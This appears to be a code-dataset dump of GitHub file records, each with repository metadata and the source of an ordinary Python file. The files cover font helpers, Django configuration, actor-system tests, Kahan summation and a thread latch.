blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb73a8d6d66d5da10e7f44de054504874ad8a460 | 08f484c61bf303ee2ec78aff9960f4812fe1e839 | /coldtype/helpers.py | 5449040cdd452d951ffbae72f5c94dca7a01bca1 | [
"Apache-2.0"
] | permissive | rohernandezz/coldtype | 02bee08e021be8dfe45328076c512f06ea8f13ae | 724234fce454699a469d17b6c78ae50fa8138169 | refs/heads/main | 2023-07-27T16:09:10.696755 | 2021-09-11T21:17:55 | 2021-09-11T21:17:55 | 405,537,609 | 0 | 0 | Apache-2.0 | 2021-09-12T03:34:29 | 2021-09-12T03:34:28 | null | UTF-8 | Python | false | false | 2,541 | py | from pathlib import Path
from defcon import Font as DefconFont
from coldtype.text.reader import normalize_font_path, StyledString
from coldtype.pens.datpen import DATPens
from coldtype.interpolation import norm, interp_dict, lerp, loopidx
from random import Random
def sibling(root, file):
return Path(root).parent.joinpath(file)
def raw_ufo(path):
return DefconFont(normalize_font_path(path))
def ßhide(el):
return None
def ßshow(el):
return el
def cycle_idx(arr, idx):
if idx < 0:
return len(arr) - 1
elif idx >= len(arr):
return 0
else:
return idx
def random_series(start=0, end=1, seed=0, count=5000):
rnd = Random()
rnd.seed(seed)
rnds = []
for x in range(count):
rnds.append(start+rnd.random()*(end-start))
return rnds
def show_points(pen, style, offcurves=True, filter=lambda i: True):
pt_labels = DATPens()
if offcurves:
def labeller(idx, x, y):
if filter(idx):
pt_labels.append(StyledString(str(idx), style).pen().translate(x, y))
pen.map_points(labeller)
else:
for idx, (m, pts) in enumerate(pen.value):
if len(pts) > 0 and filter(idx):
pt_labels += StyledString(str(idx), style).pen().translate(*pts[-1])
return pt_labels
_by_uni = None
_by_glyph = None
_class_lookup = None
def _populate_glyphs_unis():
global _by_uni
global _by_glyph
global _class_lookup
_by_uni = {}
_by_glyph = {}
_class_lookup = {}
#try:
if True:
lines = (Path(__file__).parent.parent / "assets/glyphNamesToUnicode.txt").read_text().split("\n")
for l in lines:
if l.startswith("#"):
continue
l = l.split(" ")[:3]
uni = int(l[1], 16)
_by_uni[uni] = l[0]
_by_glyph[l[0]] = uni
_class_lookup[l[0]] = l[2]
#except:
# pass
def uni_to_glyph(u):
if not _by_uni:
_populate_glyphs_unis()
return _by_uni.get(u)
def glyph_to_uni(g):
if g.lower() in [
"gcommaaccent",
"kcommaaccent",
"lcommaaccent",
"ncommaaccent",
"rcommaaccent",
]:
g = g.replace("commaaccent", "cedilla")
elif g.lower() == "kgreenlandic":
g = g.replace("greenlandic", "ra")
if not _by_glyph:
_populate_glyphs_unis()
return _by_glyph.get(g)
def glyph_to_class(g):
if not _class_lookup:
_populate_glyphs_unis()
return _class_lookup.get(g) | [
"rob.stenson@gmail.com"
] | rob.stenson@gmail.com |
5bdb03989f229d884781faa92039d3ae802ef1cd | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2276/60580/316515.py | 8b6451c802044f3f3c441502c4705c5b7a3a4460 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 643 | py | def manage(R, C, r0, c0):
ans = [[r0, c0]]
if R * C == 1:
return ans
else:
for k in range(1, 2 * (R + C), 2):
for dr, dc, dk in ((0, 1, k), (1, 0, k), (0, -1, k + 1), (-1, 0, k + 1)):
for _ in range(dk):
r0 = r0 + dr
c0 = c0 + dc
if 0 <= r0 < R and 0 <= c0 < C:
ans.append([r0, c0])
if len(ans) == R * C:
return ans
return ans
R = int(input())
C = int(input())
r0 = int(input())
c0 = int(input())
result = manage(R, C, r0, c0)
print(result)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
6cd50fc250fd30608492a7d43a5d379ded730f9b | ae1e5b78fcbb88225b414fbdaecaa3783ae37fd8 | /guillotina_glex/utility.py | 2587ed35b06a46f6a203c894d716ceb9f9a15e9e | [] | no_license | vangheem/guillotina_glex | d65d7cfce8702a3b31ca5516f001f9bb89b43707 | ef22a7c42191d6a8492e6aceb81273a326eaa6aa | refs/heads/master | 2021-01-06T20:35:35.059172 | 2017-09-05T00:33:22 | 2017-09-05T00:33:22 | 99,527,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import asyncio
import base64
import json
import logging
import os
import aiohttp
from guillotina import app_settings, configure
from guillotina.async import IAsyncUtility
from guillotina.component import getUtility
from guillotina_gcloudstorage.interfaces import IGCloudBlobStore
from guillotina_gcloudstorage.storage import OBJECT_BASE_URL
from .db import DB
logger = logging.getLogger(__name__)
_ignored_titles = (
'workout',
'pilates',
'all about',
'songs',
'insanity',
'lesson',
'disc'
)
OMDB_URL = 'http://www.omdbapi.com/'
class IGlexUtility(IAsyncUtility):
pass
@configure.utility(provides=IGlexUtility)
class GlexUtility:
def __init__(self, settings={}, loop=None):
self._settings = settings
self._loop = loop
async def initialize(self, app=None):
self._queue = asyncio.Queue()
self._db = DB()
for prefix in app_settings["bucket_folders"]:
await self.load_videos(prefix)
while True:
try:
video = await self._queue.get()
await self.get_video_data(video)
except Exception:
logger.warn(
'error getting video data',
exc_info=True)
await asyncio.sleep(1)
finally:
self._queue.task_done()
async def get_video_data(self, video):
filename = video['name'].split('/')[-1]
video['filename'] = filename
name = '.'.join(filename.split('.')[:-1]).replace('.', '')
if not os.path.exists(app_settings['download_folder']):
os.mkdir(app_settings['download_folder'])
storage_filename = '{}-info'.format(
base64.b64encode(video['id'].encode('utf8')).decode('utf8'))
filepath = os.path.join(app_settings['download_folder'],
storage_filename)
if os.path.exists(filepath):
with open(filepath) as fi:
video['data'] = json.loads(fi.read())
logger.warn(f'found cached data for movie for {filename}')
return
for ignored in _ignored_titles:
if ignored in name.lower():
return
tries = [
name,
name.replace('_', ' ')
]
for removed in ('-', ':', '('):
if removed in name:
tries.append(name.split(removed)[0].strip())
for movie_name in tries:
logger.warn(f'searching for movie name {movie_name}')
async with aiohttp.ClientSession() as session:
resp = await session.get(OMDB_URL, params={
't': movie_name,
'apikey': app_settings['omdb_api_key']
})
if resp.status == 200:
data = await resp.json()
if data['Response'] == 'True':
video['data'] = data
with open(filepath, 'w') as fi:
fi.write(json.dumps(data))
return
else:
data = await resp.text()
logger.warn(f'error getting video data for {name}, '
f'status: {resp.status}, text: {data}')
return
# nothing found, write to that effect...
with open(filepath, 'w') as fi:
fi.write(json.dumps({'Response': 'False'}))
async def finalize(self, app=None):
pass
async def get_db(self):
return await self._db.get()
async def load_videos(self, prefix='Movies/'):
db = await self._db.get()
if 'videos' not in db:
db['videos'] = {}
util = getUtility(IGCloudBlobStore)
async with aiohttp.ClientSession() as session:
access_token = await util.get_access_token()
url = '{}/vangheem-media/o'.format(OBJECT_BASE_URL)
resp = await session.get(url, headers={
'AUTHORIZATION': 'Bearer %s' % access_token
}, params={
'prefix': prefix
})
data = await resp.json()
for video in data['items']:
filename = video['name']
if filename == prefix:
continue
ext = filename.split('.')[-1].lower()
if ext not in ('m4v', 'mov', 'mp4'):
continue
video = {
'name': filename,
'id': video['id'],
'created': video['timeCreated'],
'updated': video['updated'],
'link': video['mediaLink'],
'size': video['size'],
'selfLink': video['selfLink']
}
db['videos'][video['id']] = video
await self._queue.put(video)
await self._db.save()
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
b6f5cd268a316233e9b02e99e538aac933b2d87b | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /2-Research_Defense/sample_distribution.py | b70dd6d4e01d8989ed15ce6a6384553f4a8bc803 | [] | no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 2,247 | py | import numpy as np
from fits import cdf_points, flat_fit, linear_fit, cubic_fit, quintic_fit
from util.plot import Plot
from random import seed, sample
values = list(np.percentile(np.random.normal(size=(100000,)),
np.linspace(0,100,1000)))
truth = linear_fit(values)
true_min_max = (min(values), max(values))
# Create a visual of some sample distribution approximations.
def make_plot(functions, prename):
# Initialize some settings.
seed(0); k = 10
pop = sample(values, k)
x, y = cdf_points(pop)
styles = [None, "dashdot", "dot", "dash"]
styles = [None] * 4
# Create the plot.
p = Plot("", "x","CDF", font_family="times", font_size=18)
p.add("Sample", x, y)
p.add_func("Truth", truth, true_min_max, color=p.color((0,0,0,.3)))
for f,s in zip(functions, styles):
name = f.__name__.replace("_"," ").title().split()[0].replace("Flat","EDF")
# Set the legend properties.
if "quintic" in name.lower():
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8, fill='toprevy')
else:
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8)
legend = dict(
xanchor = "center",
yanchor = "top",
x = .25,
y = .8,
orientation = "v",
bgcolor="white",
bordercolor="grey",
borderwidth=.5
)
# Create the plot.
# p.show(y_range=[-.1, 1.1], x_range=true_min_max, width=400*1.4,
# height=300*1.4) #, file_name=prename+"-sample-prediction.html")
# - remove the stuff from quintic fit
# - remove error bar plots
# Fit the errors
p = Plot("", "Absolute Error","CDF", font_family="times", font_size=18)
print("Computing errors..")
fit = f(pop)
errors = abs(np.linspace(0,1,len(values)) - np.array([fit(v) for v in values]))
print("Fitting error distribution..")
fit = linear_fit(errors)
print("Making plot..")
p.add_func("Error", fit, [min(errors),max(errors)])
p.show(width=400*1.4, height=300*1.4)
# Make the two different plots.
functions = [flat_fit, linear_fit, cubic_fit, quintic_fit]
make_plot(functions, "fl")
# functions = [cubic_fit, quintic_fit]
# make_plot(functions, "cq")
| [
"thomas.ch.lux@gmail.com"
] | thomas.ch.lux@gmail.com |
1e7d8c52911d6060dd4720aae9d114a1d173594a | 3049bc6a1d8ed3b1dfe7280a551bf14cd7df1d98 | /thespian/test/testSystemMessages.py | 02bc9eaa2c799e5e75d136ac1c33f6e3addaefec | [
"MIT"
] | permissive | liuzhijun/Thespian | a9e159f21af1018fe45cce681390fba4fd28bdae | a536cbeace24ab84659160e2a438ebdd62a891e7 | refs/heads/master | 2021-01-15T12:41:27.137415 | 2016-04-08T01:33:27 | 2016-04-08T01:33:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | import unittest
import logging
import time, datetime
import thespian.test.helpers
from thespian.actors import *
from thespian.test import ActorSystemTestCase
class EchoActor(Actor):
def receiveMessage(self, msg, sender):
logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
self.send(sender, msg)
class Kill_The_Messenger(Actor):
def receiveMessage(self, message, sender):
self.send(sender, ActorExitRequest())
class FakeSystemMessage(ActorSystemMessage):
pass
smallwait = datetime.timedelta(milliseconds=50)
class TestASimpleSystem(ActorSystemTestCase):
testbase='Simple'
scope='func'
def testCreateActorSystem(self):
pass
def testSimpleActor(self):
echo = ActorSystem().createActor(EchoActor)
def testSimpleMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, 'hello')
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testSystemMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, FakeSystemMessage())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testKillMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, ActorExitRequest())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testKillMessageTellKiller(self):
ktm = ActorSystem().createActor(Kill_The_Messenger)
ActorSystem().tell(ktm, 'hello')
ActorSystem().tell(ktm, ActorExitRequest())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testSimpleMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
self.assertEqual(ActorSystem().ask(echo, 'hello', smallwait), 'hello')
def testSystemMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
# SystemMessages are explicitly filtered from being returned
# via Ask() or Tell(), with the exception of PoisonMessage.
self.assertIsNone(ActorSystem().ask(echo, FakeSystemMessage(), smallwait))
def testKillMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
# SystemMessages are explicitly filtered from being returned
# via Ask() or Tell(), with the exception of PoisonMessage.
self.assertIsNone(ActorSystem().ask(echo, ActorExitRequest(), smallwait))
def testKillMessageAskKiller(self):
ktm = ActorSystem().createActor(Kill_The_Messenger)
self.assertIsNone(ActorSystem().ask(ktm, 'hello', smallwait))
self.assertIsNone(ActorSystem().ask(ktm, ActorExitRequest(), smallwait))
class TestMultiprocUDPSystem(TestASimpleSystem):
testbase='MultiprocUDP'
def setUp(self):
self.setSystemBase('multiprocUDPBase')
super(TestMultiprocUDPSystem, self).setUp()
class TestMultiprocTCPSystem(TestASimpleSystem):
testbase='MultiprocTCP'
def setUp(self):
self.setSystemBase('multiprocTCPBase')
super(TestMultiprocTCPSystem, self).setUp()
class TestMultiprocQueueSystem(TestASimpleSystem):
testbase='MultiprocQueue'
def setUp(self):
self.setSystemBase('multiprocQueueBase')
super(TestMultiprocQueueSystem, self).setUp()
| [
"kquick@godaddy.com"
] | kquick@godaddy.com |
743b5ae680bd84ca58609986ff88af66169e4909 | a512b8893b0d2de827d6292e810f3a98b41e132c | /Week8/Day3/Solutions/Python/prog5.py | bdf631feab069e18d120788bb85471ff2fb8701d | [] | no_license | Audarya07/Daily-Flash-Codes | d771079fd0d470e2d3e05679f17f32fb64b4f426 | cf96ca2b1676b038e243fac67be778381492ffeb | refs/heads/master | 2022-11-06T15:37:47.180729 | 2020-06-25T16:20:55 | 2020-06-25T16:20:55 | 274,960,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | print("Point A(x1,y1) = ",end=" ")
a = [int(x) for x in input().split()][:2]
print("Point B(x2,y2) = ",end=" ")
b = [int(x) for x in input().split()][:2]
print("Point c(x3,y3) = ",end=" ")
c = [int(x) for x in input().split()][:2]
distAB = ((b[0]-a[0])**2 + (b[1]-a[1])**2)**0.5
print("Distance AB = ",round(distAB,2))
distBC = ((c[0]-b[0])**2 + (c[1]-b[1])**2)**0.5
print("Distance BC = ",round(distBC,2))
distAC = ((c[0]-a[0])**2 + (c[1]-a[1])**2)**0.5
print("Distance AC = ",round(distAC,2))
| [
"audiuttarwar2000@gmail.com"
] | audiuttarwar2000@gmail.com |
e4a964c0162eae94bed9279674c41123d3a52262 | db217a42aa96688ce2d257820398fcc57bc1f810 | /gpscraper/admin.py | 81efffeec794a7cb5f214403c71d322afd2b92ba | [] | no_license | ans2human/Google-Play-Store-Scraper | 4a3012c5c22feb8dfd92cb9534f6ade400cb096f | ddf576d9c159c98429643e60fb5a642bbe848d49 | refs/heads/master | 2022-12-10T20:10:01.920280 | 2018-10-13T06:27:04 | 2018-10-13T06:27:04 | 149,260,886 | 1 | 1 | null | 2022-07-06T19:52:11 | 2018-09-18T09:16:37 | Python | UTF-8 | Python | false | false | 263 | py | from django.contrib import admin
from gpscraper.models import AppData, AppSearchIndex
class AppDataAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'dev_name', 'category')
admin.site.register(AppData, AppDataAdmin)
admin.site.register(AppSearchIndex)
| [
"ans2human@gmail.com"
] | ans2human@gmail.com |
3820e7373bc32531be8713da83fd7a55840bcfc7 | 270363be5ea94d33469fe4271eccb343357d4fa6 | /linalg/kahan/sum.py | 36c6ae09c06c5cab9877e5ad05b987dbbea1f78c | [] | no_license | tkelestemur/learn-linalg | c487389e9802b0223232bcb8c9ec0003cc7df091 | a6e04e903e5c9e00801b56a228c56fd8b8ba8c71 | refs/heads/master | 2023-03-19T05:53:34.407780 | 2021-01-02T13:54:40 | 2021-01-02T14:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | import numpy as np
class KahanSum:
"""Precise summation of finite-precision floating point numbers [1].
Reduces numerical error by storing a running compensation term that captures
lost low-order bits.
References:
[1]: https://en.wikipedia.org/wiki/Kahan_summation_algorithm
"""
def __init__(self):
"""Constructor."""
self.reset()
def reset(self):
"""Clears the internal state."""
# Create one variable for keeping track of the sum and one for storing the
# moving compensation term.
self._sum = 0
self._compensation = 0
def add(self, x):
"""Adds the float x to the summation term."""
x += self._compensation
sum = self._sum + x
self.compensation = x - (sum - self._sum)
self._sum = sum
def result(self):
return self._sum
def kahan_sum(x, axis=None, keepdims=False):
"""Kahan summation for 1 and 2D arrays.
Args:
x: A 1D or 2D array-like object.
axis: The axis which will be collapsed to perform the summation.
keepdims: A bool specifying whether to keep the collapsed axis.
Returns:
The kahan summation of x.
"""
# Ensure the array-like object is at most 2D.
x = np.asarray(x)
error_msg = "[!] Only 1D and 2D arrays are currently supported."
assert (x.ndim <= 2), error_msg
# Sanity check axis args.
error_msg = "[!] Axis value can only be None, 0 or 1."
assert (axis in [None, 0, 1]), error_msg
# Instantiate summation object.
summation = KahanSum()
# 1D case.
if x.ndim == 1:
for i in range(len(x)):
summation.add(x[i])
return summation.result()
# 2D case.
num_rows, num_cols = x.shape
if axis is None:
for i in range(num_rows):
for j in range(num_cols):
summation.add(x[i, j])
result = summation.result()
elif axis == 0:
# This list will hold num_cols sums.
sums = []
for i in range(num_cols):
summation.reset()
for j in range(num_rows):
summation.add(x[j, i])
sums.append(summation.result())
result = np.asarray(sums)
if keepdims:
result = result.reshape([1, num_cols])
else:
# This list will hold num_rows sums.
sums = []
for i in range(num_rows):
summation.reset()
for j in range(num_cols):
summation.add(x[i, j])
sums.append(summation.result())
result = np.asarray(sums)
if keepdims:
result = result.reshape([num_rows, 1])
return result
| [
"kevinarmandzakka@gmail.com"
] | kevinarmandzakka@gmail.com |
3538acda3d446425f03488c8e3f2348b3350b383 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/treemap/_visible.py | 537d81152ae25e0c4789549c71e0a378ae159bba | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 470 | py | import _plotly_utils.basevalidators
class VisibleValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(self, plotly_name="visible", parent_name="treemap", **kwargs):
super(VisibleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
values=kwargs.pop("values", [True, False, "legendonly"]),
**kwargs
)
| [
"noreply@github.com"
] | hugovk.noreply@github.com |
17a937aeee7d4803c81b66038606d007a43ba375 | 01c3ff1d74e754e0d4ce0fb7f8a8b329ec3766e1 | /python_exercises/19others/pattern5.py | 483e78e63f8ebcaf6ba87bcd805f663dff7c4353 | [] | no_license | vineel2014/Pythonfiles | 5ad0a2b824b5fd18289d21aa8306099aea22c202 | 0d653cb9659fe750cf676a70035ab67176179905 | refs/heads/master | 2020-04-28T03:56:22.713558 | 2019-03-11T08:38:54 | 2019-03-11T08:38:54 | 123,681,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | def printTri(n):
for i in range(1,n+1):
print(' '.join(str(i)*i))
n=int(input("enter range to display number triangle"))
printTri(n)
| [
"vineel2006@gmail.com"
] | vineel2006@gmail.com |
01eab334f8dd405e5b1de91172d26a98b76d39ee | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/findit/findit_v2/services/test/build_util_test.py | 85dd03198119d71eff746fb8c2caeb9a58e5112b | [
"BSD-3-Clause"
] | permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 1,905 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.build_pb2 import BuilderID
from buildbucket_proto.step_pb2 import Step
from findit_v2.services import build_util
from findit_v2.services.context import Context
from findit_v2.services.failure_type import StepTypeEnum
class BuildUtilTest(unittest.TestCase):
def testGetFailedStepsInBuild(self):
build_id = 8000000000123
build_number = 123
builder = BuilderID(project='chromium', bucket='try', builder='linux-rel')
build = Build(
id=build_id,
builder=builder,
number=build_number,
status=common_pb2.FAILURE)
step1 = Step(name='s1', status=common_pb2.SUCCESS)
step2 = Step(name='compile', status=common_pb2.FAILURE)
build.steps.extend([step1, step2])
context = Context(
luci_project_name='chromium',
gitiles_host='gitiles.host.com',
gitiles_project='project/name',
gitiles_ref='ref/heads/master',
gitiles_id='git_sha')
failed_steps = build_util.GetFailedStepsInBuild(context, build)
self.assertEqual(1, len(failed_steps))
self.assertEqual('compile', failed_steps[0][0].name)
self.assertEqual(StepTypeEnum.COMPILE, failed_steps[0][1])
def testGetAnalyzedBuildIdFromRerunBuild(self):
analyzed_build_id = 8000000000123
build = Build(tags=[{
'key': 'analyzed_build_id',
'value': str(analyzed_build_id)
}])
self.assertEqual(analyzed_build_id,
build_util.GetAnalyzedBuildIdFromRerunBuild(build))
def testGetAnalyzedBuildIdFromRerunBuildNoAnalyzedBuildId(self):
self.assertIsNone(build_util.GetAnalyzedBuildIdFromRerunBuild(Build()))
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
c3ff78ade7a48d81ea1bf2007c51af01e08bfb47 | 92e3a6424326bf0b83e4823c3abc2c9d1190cf5e | /scripts/icehouse/opt/stack/taskflow/taskflow/types/latch.py | 0945a286cd816a0b0bdfd456401608455ecb04dd | [
"Apache-2.0"
] | permissive | AnthonyEzeigbo/OpenStackInAction | d6c21cf972ce2b1f58a93a29973534ded965d1ea | ff28cc4ee3c1a8d3bbe477d9d6104d2c6e71bf2e | refs/heads/master | 2023-07-28T05:38:06.120723 | 2020-07-25T15:19:21 | 2020-07-25T15:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from taskflow.types import timing as tt
class Latch(object):
"""A class that ensures N-arrivals occur before unblocking.
TODO(harlowja): replace with http://bugs.python.org/issue8777 when we no
longer have to support python 2.6 or 2.7 and we can only support 3.2 or
later.
"""
def __init__(self, count):
count = int(count)
if count <= 0:
raise ValueError("Count must be greater than zero")
self._count = count
self._cond = threading.Condition()
@property
def needed(self):
"""Returns how many decrements are needed before latch is released."""
return max(0, self._count)
def countdown(self):
"""Decrements the internal counter due to an arrival."""
self._cond.acquire()
try:
self._count -= 1
if self._count <= 0:
self._cond.notify_all()
finally:
self._cond.release()
def wait(self, timeout=None):
"""Waits until the latch is released.
NOTE(harlowja): if a timeout is provided this function will wait
until that timeout expires, if the latch has been released before the
timeout expires then this will return True, otherwise it will
return False.
"""
w = None
if timeout is not None:
w = tt.StopWatch(timeout).start()
self._cond.acquire()
try:
while self._count > 0:
if w is not None:
if w.expired():
return False
else:
timeout = w.leftover()
self._cond.wait(timeout)
return True
finally:
self._cond.release()
| [
"cody@uky.edu"
] | cody@uky.edu |
9c6962d424a390c3405c175a8872f70e709b0ce9 | 260f6aafc0ad0ddaba9d672a07ba3f2dd8822031 | /backend/doctor_24708/urls.py | cbd3997267bd3fea03835b10cc434b7fb020de29 | [] | no_license | crowdbotics-apps/doctor-24708 | 9419513611c41e4383a79a97b9e2b96d1f762919 | 74623cb899ba50ad6957cef018d61a000a2e5efb | refs/heads/master | 2023-03-09T08:48:37.840476 | 2021-02-25T04:21:40 | 2021-02-25T04:21:40 | 342,120,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | """doctor_24708 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
path("api/v1/", include("dating.api.v1.urls")),
path("dating/", include("dating.urls")),
path("home/", include("home.urls")),
]
admin.site.site_header = "doctor"
admin.site.site_title = "doctor Admin Portal"
admin.site.index_title = "doctor Admin"
# swagger
api_info = openapi.Info(
title="doctor API",
default_version="v1",
description="API documentation for doctor App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
7efc136aaf2ae92ccc81f090ee865dba6abf2231 | 45ab4c22d918dc4390572f53c267cf60de0d68fb | /src/Analysis/Engine/Impl/Typeshed/third_party/2and3/Crypto/Util/RFC1751.pyi | 273204b24babd0a8b0f42f0ad4ca7df967b7998e | [
"MIT",
"Apache-2.0"
] | permissive | sourcegraph/python-language-server | 580a24fd15fe9d4abeb95e9333d61db1c11a2670 | 64eae156f14aa14642afcac0e7edaf5d7c6d1a1c | refs/heads/master | 2023-04-09T21:17:07.555979 | 2018-12-06T23:25:05 | 2018-12-06T23:25:05 | 155,174,256 | 2 | 2 | Apache-2.0 | 2018-10-29T08:06:49 | 2018-10-29T08:06:49 | null | UTF-8 | Python | false | false | 168 | pyi | from typing import Any
__revision__ = ... # type: str
binary = ... # type: Any
def key_to_english(key): ...
def english_to_key(s): ...
wordlist = ... # type: Any
| [
"alsher@microsoft.com"
] | alsher@microsoft.com |
810b8e0187dfd900d3aaa49048955829777a39fc | 162e2588156cb2c0039c926c5c442363d9f77b00 | /tests/integration_tests/data_steward/utils/sandbox_test.py | eb5c79832b115f502c30291f17e07c1d6175b607 | [
"MIT"
] | permissive | nishanthpp93/curation | 38be687240b52decc25ffb7b655f25e9faa40e47 | ac9f38b2f4580ae806121dd929293159132c7d2a | refs/heads/develop | 2022-08-08T20:33:53.125216 | 2021-12-03T21:38:48 | 2021-12-03T21:38:48 | 155,608,471 | 1 | 0 | MIT | 2020-10-09T01:14:39 | 2018-10-31T18:54:34 | Python | UTF-8 | Python | false | false | 2,053 | py | # Python imports
import os
import unittest
import app_identity
# Project Imports
from utils import sandbox
from utils.bq import get_client
class SandboxTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('**************************************************************')
print(cls.__name__)
print('**************************************************************')
def setUp(self):
self.project_id = app_identity.get_application_id()
self.dataset_id = os.environ.get('UNIONED_DATASET_ID')
self.sandbox_id = sandbox.get_sandbox_dataset_id(self.dataset_id)
self.fq_sandbox_id = f'{self.project_id}.{self.sandbox_id}'
# Removing any existing datasets that might interfere with the test
self.client = get_client(self.project_id)
def test_create_sandbox_dataset(self):
# pre-conditions
pre_test_datasets_obj = list(self.client.list_datasets(self.project_id))
pre_test_datasets = [d.dataset_id for d in pre_test_datasets_obj]
